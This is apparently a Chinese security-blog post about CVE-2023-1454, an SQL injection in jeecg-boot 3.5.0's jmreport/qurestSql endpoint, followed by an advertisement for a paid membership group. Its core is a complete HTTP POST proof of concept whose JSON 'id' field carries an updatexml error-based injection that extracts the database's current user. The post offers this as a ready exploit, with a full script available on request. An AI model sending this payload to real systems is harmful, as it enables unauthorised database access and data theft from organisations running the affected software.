免责声明
由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
文末有脚本
0x01 介绍
在 jeecg-boot 3.5.0 中发现了一个被归类为严重的漏洞。这会影响文件 jmreport/qurestSql 的未知部分。参数 apiSelectId 的操作导致 sql 注入。可以远程发起攻击。
0x02 poc
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
Content-Length: 130
Content-Type: application/json;charset=UTF-8
{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
0x03 参考链接
https://vuldb.com/?id.223299
https://github.com/J0hnWalker/jeecg-boot-sqli
https://vuldb.com/?ctiid.223299
https://cxsecurity.com/cveshow/CVE-2023-1454/
0x04 脚本
后台回复 "CVE-2023-1454"
链接失效可加我wx私发给你,技术交流可加
WK安全 知识星球 一次付费,永久免费(付费之后会拉入内部成员群,直接免费续上)。有需要的直接添加下面微信 99永久,私我支付,直接拉内部成员群,扫码支付,三天后拉内部成员群。
内部群共享
1.fofa高级会员账号
2.某学院高级靶场账号(附带wp)
3.专属内部漏洞库(持续更新)
4.原创漏洞挖掘报告
5.工作、护网内推
星球介绍:
星球针对安全新人有优秀学习资源,星球专属嘉宾进行问题解答,
性价比很高。
如果你是入门不久,想要提升漏洞挖掘能力,那该星球是个不错的选择,星球内拥有
专属漏洞报告,
各种奇淫技巧、挖洞技术、专属嘉宾在线问答等。
欢迎您的加入,星球部分内容请你查看!!
星球专栏预览
扫码查看更多内容
文章引用微信公众号"WK安全",如有侵权,请联系管理员删除!